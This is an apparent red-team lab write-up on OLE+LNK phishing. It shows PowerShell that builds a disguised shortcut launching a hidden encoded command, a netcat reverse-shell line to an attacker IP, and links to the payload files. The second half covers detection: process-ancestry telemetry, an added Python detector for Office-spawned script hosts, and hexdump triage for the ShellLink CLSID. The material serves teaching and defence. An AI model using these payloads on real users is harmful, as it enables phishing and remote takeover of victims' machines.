# Phishing: OLE + LNK

This lab explores a popular phishing technique where attackers embed .lnk files into Office documents and camouflage them with MS Word icons in order to deceive victims into clicking and running them.

## Weaponization

Creating an .LNK file that will trigger the payload once executed:

{% code title="attacker\@local" %}

```powershell
$command = 'Start-Process c:\shell.cmd'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\experiments\ole+lnk\Invoice-FinTech-0900541.lnk")
$link.windowstyle = "7"
$link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$link.iconlocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"
$link.arguments = "-Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA=="
$link.save()
```

{% endcode %}

The PowerShell payload runs `c:\shell.cmd`, which starts a rudimentary netcat reverse shell:

{% code title="c:\shell.cmd" %}

```batch
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
```

{% endcode %}

Once the above PowerShell script is executed, an `.LNK` shortcut is created:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRFnt-cVU18pcOCBHO%2F-LKRGjwTWCMH7EOxbc_b%2Fole-lnk-shortcut-created.png?alt=media\&token=d2b25553-5d1d-4535-96b3-f6b0d1ffb194)

Let's create a Word document that will contain the malicious shortcut that was created in the previous step:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRFnt-cVU18pcOCBHO%2F-LKRH-VzxxtN9fSNg2js%2Fole-good-document.png?alt=media\&token=7fae95e2-4db2-4cf1-8e41-9de8245ac2eb)

Let's insert a new object into the document by selecting `Package` and changing its icon source to the Microsoft Word executable:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRH8A1jNeHJgRGRomK%2Fole-insert-ole-object-with-icon.png?alt=media\&token=4434c3d0-adfd-4352-9968-c5c10c527f1a)

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRHOVbCzGL4Zo2WrpY%2Fole-change-icon.png?alt=media\&token=427349aa-13bd-47c4-8180-a01c41bcb7a6)

Point the package to the .lnk file containing the payload:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRIT6mm4h7eR5y9ONB%2Fole-payload.png?alt=media\&token=d0213d76-d56d-483e-a477-a6da38654390)

Final result:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIe3d5PL89KiDiGIV%2F-LKRIbB24hFM9R322XmS%2Fole-weaponized.png?alt=media\&token=032c5758-a491-48a7-85b3-aff36f38f94a)

## Execution

When the victim double-clicks the embedded object, they are presented with a popup asking them to confirm execution:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIingfVbtKzhAXuu4%2F-LKRIrtSxtXDuyyIk0fC%2Fole-execution.png?alt=media\&token=c9a8a13d-20bf-40b9-b2bc-8d6033eedbf4)

Once the victim confirms they want to open the file, the reverse shell comes back to the attacker:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRIingfVbtKzhAXuu4%2F-LKRIrtTxniAvaJ_vV5m%2Fole-execution2.png?alt=media\&token=18209e76-c17d-4f55-8f1b-5e428fae392c)

{% file src="https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRCds7Vv8FFU8H1D1b%2F-LKRFRs6PmCItZfJf0iN%2Fole.ps1?alt=media&token=7eb7972d-40ef-4c83-8322-4439a5f9808b" %}
OLE+LNK Powershell Script
{% endfile %}

{% file src="https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRCds7Vv8FFU8H1D1b%2F-LKRFM7BiZ-YUrYrELHD%2FInvoice-FinTech-0900541.lnk?alt=media&token=a67ef5cd-5cca-44fd-a8f9-b42e2c82568a" %}
Invoice-FinTech-0900541.lnk
{% endfile %}

{% file src="https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRCds7Vv8FFU8H1D1b%2F-LKRFEk2QEZ6V0akcxvk%2FCompletely%20not%20a%20scam%20-%20ole%2Blnk.docx?alt=media&token=42704fd7-2ab8-4c34-b634-33c78bd57f5f" %}
Phishing: OLE+Lnk MS Word Doc Package
{% endfile %}

## Observations

After the payload is triggered, the process ancestry looks as expected: powershell.exe is spawned by winword.exe, and cmd.exe is spawned by powershell.exe:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRJDQTbUxGUjd7WLxd%2F-LKRJFn47fbXoXbUavdK%2Fole-ancestry1.png?alt=media\&token=2a4d8cc0-e245-4619-abc5-3e05737b7b2c)

Soon after, powershell.exe exits and cmd.exe becomes an orphaned process, so a live process tree no longer shows the winword.exe ancestry:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRJDQTbUxGUjd7WLxd%2F-LKRJHK53l5r1CQKTwBT%2Fole-ancestry2.png?alt=media\&token=2b83123a-1229-4e6d-9e36-8b28f6f06bbc)
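The orphaning shown above is why process-creation telemetry (Sysmon Event ID 1, Windows Security 4688 or an EDR equivalent), which records the parent at creation time, preserves the winword.exe → powershell.exe → cmd.exe chain that a live snapshot loses. The following is an added example, not code from the original lab or from ired.team, that reconstructs ancestry from recorded creation events, contrasts it with a live-snapshot walk, and flags script hosts descended from an Office process. The event dictionaries are constructed sample data; the field names (`pid`, `ppid`, `image`, `cmdline`) are an assumption about how the events were normalized, and the Office and script-host image lists are an assumption you would tune to your environment.

```python
# Detection of Office -> script-host process chains from process-creation events.
# Added example, not the original lab's code. Image lists and field names are assumptions.

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# powershell.exe accepts unambiguous prefixes of -EncodedCommand, hence the short forms.
ENCODED_SWITCHES = {"-encodedcommand", "-enc", "-ec", "-e"}

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1000, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5200, "ppid": 4100, "image": "WINWORD.EXE",
     "cmdline": 'WINWORD.EXE "Completely not a scam - ole+lnk.docx"'},
    {"pid": 6300, "ppid": 5200, "image": "powershell.exe",
     "cmdline": "powershell.exe -Nop -sta -noni -w hidden -encodedCommand "
                "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA=="},
    {"pid": 7400, "ppid": 6300, "image": "cmd.exe", "cmdline": "cmd.exe /c c:\\shell.cmd"},
    {"pid": 8100, "ppid": 4100, "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]


def index_by_pid(events):
    """Map pid -> creation event so parent links can be followed after exit."""
    return {e["pid"]: e for e in events}


def ancestry(index, pid, live_pids=None):
    """Walk parent links from `pid` to the root, returning images root-first.

    With `live_pids` given, the walk stops at the first parent that is no longer
    running, reproducing the orphaned view a live process tree gives once
    powershell.exe has exited. Without it, recorded events keep the full chain.
    """
    chain = []
    while pid in index:
        ev = index[pid]
        chain.append(ev["image"].lower())
        if live_pids is not None and ev["ppid"] not in live_pids:
            break
        pid = ev["ppid"]
    return list(reversed(chain))


def suspicious_cmdline(cmdline):
    """True when the command line carries an encoded command or a hidden window."""
    tokens = cmdline.lower().split()
    return any(t in ENCODED_SWITCHES for t in tokens) or "hidden" in tokens


def office_spawned_script_hosts(events):
    """Flag every script host whose recorded ancestry contains an Office process."""
    index = index_by_pid(events)
    hits = []
    for ev in events:
        if ev["image"].lower() not in SCRIPT_HOSTS:
            continue
        chain = ancestry(index, ev["pid"])
        if any(img in OFFICE_HOSTS for img in chain[:-1]):
            hits.append({"pid": ev["pid"], "chain": chain,
                         "encoded_or_hidden": suspicious_cmdline(ev["cmdline"])})
    return hits


if __name__ == "__main__":
    for hit in office_spawned_script_hosts(SAMPLE_EVENTS):
        print(hit)
```

Both powershell.exe and the orphaned cmd.exe are flagged because the chain is rebuilt from creation events rather than from whichever parents happen to still be alive; the encoded-command and hidden-window flags on the powershell.exe event give a second, independent signal that survives even if the Office parent were missed.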

Like in [T1137: Phishing - Office Macros](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/t1137-office-vba-macros), you can use rudimentary tools on your Windows workstation to quickly triage the suspicious Office document. First, rename the file to a .zip extension and unzip it. Then navigate to `word\embeddings` and find the `oleObject1.bin` file that contains the malicious `.lnk`:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRfKa4jYy2qjm9kkTv%2F-LKRdsdTB5mK-QRljpQN%2Fole-embedded-bin.png?alt=media\&token=fafe3987-8cf1-41ba-8025-2268b95b7ce4)

Then run a simple `strings` or hexdump against the file and you should immediately see signs of something that should raise your eyebrow(s):

```powershell
hexdump.exe -C .\oleObject1.bin
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKRfKa4jYy2qjm9kkTv%2F-LKRfHZ7vT28S8ZGjHjx%2Fole-hexdump.png?alt=media\&token=6a6ea6be-beab-4f57-aed7-3275bab53bd3)

As an analyst, one should look for `CLSID 00021401-0000-0000-c000-000000000046` (the ShellLink class identifier) in the .bin file, which signifies that the .doc contains an embedded .lnk file. Because the GUID is stored little-endian, it appears in the hexdump as the bytes `01 14 02 00 00 00 00 00 c0 00 00 00 00 00 00 46`, immediately after the shortcut's `4c 00 00 00` header-size field. In our case this can be observed here:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LLLlUffKcHfBT7MFQh5%2F-LLLlfqklzz5ti7PtC1W%2Flnk-clsid.png?alt=media\&token=43f2f9b1-b009-4f9e-b669-9e9946585830)

## References

{% embed url="https://msdn.microsoft.com/en-gb/library/dd891343.aspx" %}

{% embed url="https://adsecurity.org/wp-content/uploads/2016/09/DerbyCon6-2016-AttackingEvilCorp-Anatomy-of-a-Corporate-Hack-Presented.pdf" %}
